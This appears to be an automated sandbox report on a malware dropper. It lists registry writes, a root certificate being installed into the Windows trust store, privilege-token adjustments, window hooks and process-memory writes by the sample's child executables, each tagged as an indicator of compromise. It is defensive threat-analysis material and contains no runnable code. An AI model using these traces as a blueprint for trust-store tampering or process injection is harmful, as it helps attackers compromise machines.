Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Info.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

c1uWn36JMLTOIWNQ5QGAwvr6.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	c1uWn36JMLTOIWNQ5QGAwvr6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	c1uWn36JMLTOIWNQ5QGAwvr6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	c1uWn36JMLTOIWNQ5QGAwvr6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	c1uWn36JMLTOIWNQ5QGAwvr6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	c1uWn36JMLTOIWNQ5QGAwvr6.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exepub2.exeInfo.exe

pid	process
1736	jfiag3g_gg.exe
1736	jfiag3g_gg.exe
4300	pub2.exe
4300	pub2.exe
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
3940	Info.exe
3940	Info.exe
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2216
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exesfjwvrc

pid process

4300 pub2.exe
4840 sfjwvrc

pid	process
2216

pid	process
4300	pub2.exe
4840	sfjwvrc

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3252	SoCleanInst.exe
Token: SeCreateTokenPrivilege	1432	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1432	Install.exe
Token: SeLockMemoryPrivilege	1432	Install.exe
Token: SeIncreaseQuotaPrivilege	1432	Install.exe
Token: SeMachineAccountPrivilege	1432	Install.exe
Token: SeTcbPrivilege	1432	Install.exe
Token: SeSecurityPrivilege	1432	Install.exe
Token: SeTakeOwnershipPrivilege	1432	Install.exe
Token: SeLoadDriverPrivilege	1432	Install.exe
Token: SeSystemProfilePrivilege	1432	Install.exe
Token: SeSystemtimePrivilege	1432	Install.exe
Token: SeProfSingleProcessPrivilege	1432	Install.exe
Token: SeIncBasePriorityPrivilege	1432	Install.exe
Token: SeCreatePagefilePrivilege	1432	Install.exe
Token: SeCreatePermanentPrivilege	1432	Install.exe
Token: SeBackupPrivilege	1432	Install.exe
Token: SeRestorePrivilege	1432	Install.exe
Token: SeShutdownPrivilege	1432	Install.exe
Token: SeDebugPrivilege	1432	Install.exe
Token: SeAuditPrivilege	1432	Install.exe
Token: SeSystemEnvironmentPrivilege	1432	Install.exe
Token: SeChangeNotifyPrivilege	1432	Install.exe
Token: SeRemoteShutdownPrivilege	1432	Install.exe
Token: SeUndockPrivilege	1432	Install.exe
Token: SeSyncAgentPrivilege	1432	Install.exe
Token: SeEnableDelegationPrivilege	1432	Install.exe
Token: SeManageVolumePrivilege	1432	Install.exe
Token: SeImpersonatePrivilege	1432	Install.exe
Token: SeCreateGlobalPrivilege	1432	Install.exe
Token: 31	1432	Install.exe
Token: 32	1432	Install.exe
Token: 33	1432	Install.exe
Token: 34	1432	Install.exe
Token: 35	1432	Install.exe
Token: SeDebugPrivilege	3512	taskkill.exe
Token: SeManageVolumePrivilege	2764	md9_1sjm.exe
Token: SeManageVolumePrivilege	2764	md9_1sjm.exe
Token: SeManageVolumePrivilege	2764	md9_1sjm.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeManageVolumePrivilege	2764	md9_1sjm.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeDebugPrivilege	3940	Info.exe
Token: SeImpersonatePrivilege	3940	Info.exe
Token: SeTcbPrivilege	5020	svchost.exe
Token: SeTcbPrivilege	5020	svchost.exe
Token: SeManageVolumePrivilege	2764	md9_1sjm.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

Accostarmi.exe.pif

pid process

5936 Accostarmi.exe.pif
2216
2216
5936 Accostarmi.exe.pif
5936 Accostarmi.exe.pif
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

5936 Accostarmi.exe.pif
5936 Accostarmi.exe.pif
5936 Accostarmi.exe.pif

pid	process
5936	Accostarmi.exe.pif
2216
2216
5936	Accostarmi.exe.pif
5936	Accostarmi.exe.pif
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216

pid	process
5936	Accostarmi.exe.pif
5936	Accostarmi.exe.pif
5936	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

9glrXkqH9i7GGQrFA3bkUmSJ.exe5YykviJ_Zodc46p_errdJids.exeY26PeZoHoz5v8PcQ9YkXcXnl.exeHKLNUgv6BDkBQC4h_3RUAIdm.exec1uWn36JMLTOIWNQ5QGAwvr6.exelfOURd4ic1TO6jCMzih2CvoQ.exeWerFault.exe2au1U3Sxz66Uu70W74ARzLOm.exeatzvKx4nr6Q1vieUIFrIao5s.exegi27Ksb4YlbDxYWvkAR_a6UO.exevk8VZZRPVzoDN0j8Eow_wmt2.exekOwUUuEfZcj2CeXc627itgCA.exeInstall.exeInstall.exeAccostarmi.exe.pif

pid	process
4820	9glrXkqH9i7GGQrFA3bkUmSJ.exe
4460	5YykviJ_Zodc46p_errdJids.exe
4168	Y26PeZoHoz5v8PcQ9YkXcXnl.exe
1492	HKLNUgv6BDkBQC4h_3RUAIdm.exe
3044	c1uWn36JMLTOIWNQ5QGAwvr6.exe
5000	lfOURd4ic1TO6jCMzih2CvoQ.exe
4204	WerFault.exe
868	2au1U3Sxz66Uu70W74ARzLOm.exe
3016	atzvKx4nr6Q1vieUIFrIao5s.exe
1780	gi27Ksb4YlbDxYWvkAR_a6UO.exe
4204	WerFault.exe
4972	vk8VZZRPVzoDN0j8Eow_wmt2.exe
4136	kOwUUuEfZcj2CeXc627itgCA.exe
888	Install.exe
4452	Install.exe
5936	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXesvchost.exeInfo.execmd.exeFile.exe

description	pid	process	target process
PID 2560 wrote to memory of 3252	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	SoCleanInst.exe
PID 2560 wrote to memory of 3252	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	SoCleanInst.exe
PID 2560 wrote to memory of 2764	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	md9_1sjm.exe
PID 2560 wrote to memory of 2764	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	md9_1sjm.exe
PID 2560 wrote to memory of 2764	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	md9_1sjm.exe
PID 2560 wrote to memory of 1160	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Folder.exe
PID 2560 wrote to memory of 1160	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Folder.exe
